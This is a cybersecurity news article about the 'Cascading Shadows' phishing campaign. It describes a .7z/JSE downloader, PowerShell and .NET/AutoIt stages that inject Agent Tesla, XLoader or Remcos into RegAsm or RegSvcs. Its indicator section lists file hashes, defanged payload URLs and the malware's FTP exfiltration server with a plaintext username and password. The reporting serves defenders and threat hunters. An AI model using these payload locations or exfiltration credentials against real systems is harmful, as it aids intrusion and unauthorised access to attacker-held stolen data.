Thursday, May 8, 2025
HomeCyber AttackThreat Actors Leverage Cascading Shadows Attack Chain to Evade Detection and Hinder...

Threat Actors Leverage Cascading Shadows Attack Chain to Evade Detection and Hinder Analysis

Published on

SIEM as a Service

Follow Us on Google News

A sophisticated multi-layered phishing campaign was uncovered, employing a complex attack chain known as “Cascading Shadows” to deliver various malware, including Agent Tesla, XLoader, and Remcos RAT.

The attackers’ strategy hinges on using multiple, seemingly simple but strategically layered stages, which not only evade traditional sandbox environments but also complicates analysis by cybersecurity experts.

The Deceptive Prelude

The campaign begins with phishing emails disguised as official communications, typically claiming a new payment has been made.

- Advertisement - Google News

These emails contain a compressed file named “doc00290320092.7z”, directing the victim to review an ‘order file’.

Cascading Shadows
 Attack chain used for this campaign.

Once opened, the .7z file reveals a JavaScript encoded (.jse) file. This initial file acts as a downloader, fetching a PowerShell script from a remote server, initiating the infection chain.

Unraveling the Layers

The PowerShell script, devoid of heavy obfuscation, hosts a Base64-encoded payload which is decoded, saved to disk, and executed.

Interestingly, subsequent analysis has revealed that the payload varies, choosing between either a .NET or an AutoIt compiled executable.

According to the Report, this bifurcation in the attack chain allows the malware to adapt, choosing between paths to increase infection success.

The .NET executable decrypts the payload, either with AES or Triple DES, before injecting it into a running RegAsm.exe process.

Similarities found in multiple .NET samples from this campaign indicate a deliberate design to inject different malware families, like Agent Tesla or XLoader, into running processes, leveraging the same underlying infection method.

On the other alternative path, AutoIt executables introduce an additional layer of complexity.

They contain encrypted payloads that load shellcode, which, once decrypted, injects the final malware into a RegSvcs process.

This AutoIt script’s role also includes running malicious code through DLLCALLADDRESS references, posing challenges for analysis.

Despite the attackers’ intricate strategies, security solutions like Advanced WildFire can detect each stage of the Cascading Shadows attack chain.

Cascading Shadows
AutoIt script extracted by WildFire.

Palo Alto Networks’ Advanced URL Filtering, Advanced DNS Security, and Cortex XDR with XSIAM provide layered defenses against these threats.

For organizations potentially compromised, immediate contact with Unit 42 Incident Response is recommended.

This attack chain highlights a continuing trend in cyber threats, where attackers rely on complexity and variety rather than sophisticated obfuscation to evade detection.

The analyzed techniques offer crucial insights for enhancing threat hunting capabilities, particularly in dealing with AutoIt-based malware and debugging shellcode.

This analysis underscores the perpetual cat-and-mouse game between cyber defenders and attackers, showcasing the need for constant vigilance and advanced detection capabilities.

Indicators of Compromise

AutoIt Infection Chain 1

SHA-256 HashDescription
00dda3183f4cf850a07f31c776d306438b7ea408e7fb0fc2f3bdd6866e362ac5doc00290320092.7z
f4625b34ba131cafe5ac4081d3f1477838afc16fedc384aea4b785832bcdbfdddoc00290320092.jse
d616aa11ee05d48bb085be1c9bad938a83524e1d40b3f111fa2696924ac004b2files.catbox[.]moe/rv94w8[.]ps1
550f191396c9c2cbf09784f60faab836d4d1796c39d053d0a379afaca05f8ee8AutoIt compiled EXE (Agent Tesla variant)

AutoIt Infection Chain 2

SHA-256 HashDescription
61466657b14313134049e0c6215266ac1bb1d4aa3c07894f369848b939692c49doc00290320092.7z
7fefb7a81a4c7d4a51a9618d9ef69e951604fa3d7b70d9a2728c971591c1af25doc00290320092.jse
8cdb70f9f1f38b8853dfad62d84618bb4f10acce41e9f0fddab422c2c253c994files.catbox[.]moe/gj7umd[.]ps1
c93e37e35c4c7f767a5bdab8341d8c2351edb769a41b0c9c229c592dbfe14ff2AutoIt compiled EXE (Agent Tesla variant)

Agent Tesla (Variant) Configuration

FieldValue
FTP Serverftp[:]//ftp.jeepcommerce[.]rs
FTP Usernamekel-bin@jeepcommerce[.]rs
FTP PasswordJhrn)GcpiYQ7

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

ESET Reveals How to Spot Fake Calls Demanding Payment for ‘Missed Jury Duty’

ESET, a leading cybersecurity firm, has shed light on one particularly insidious scheme: fake...

Researchers Turn the Tables: Scamming the Scammers in Telegram’s PigButchering Scheme

Cybersecurity specialists have devised an innovative approach to combat an emerging cybercrime called "PigButchering"...

New Spam Campaign Leverages Remote Monitoring Tools to Exploit Organizations

A sophisticated spam campaign targeting Portuguese-speaking users in Brazil has been uncovered by Cisco...

New Attack Exploits X/Twitter Ad URL Feature to Deceive Users

Silent Push Threat Analysts have recently exposed a sophisticated financial scam leveraging a vulnerability...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

ESET Reveals How to Spot Fake Calls Demanding Payment for ‘Missed Jury Duty’

ESET, a leading cybersecurity firm, has shed light on one particularly insidious scheme: fake...

Researchers Turn the Tables: Scamming the Scammers in Telegram’s PigButchering Scheme

Cybersecurity specialists have devised an innovative approach to combat an emerging cybercrime called "PigButchering"...

New Spam Campaign Leverages Remote Monitoring Tools to Exploit Organizations

A sophisticated spam campaign targeting Portuguese-speaking users in Brazil has been uncovered by Cisco...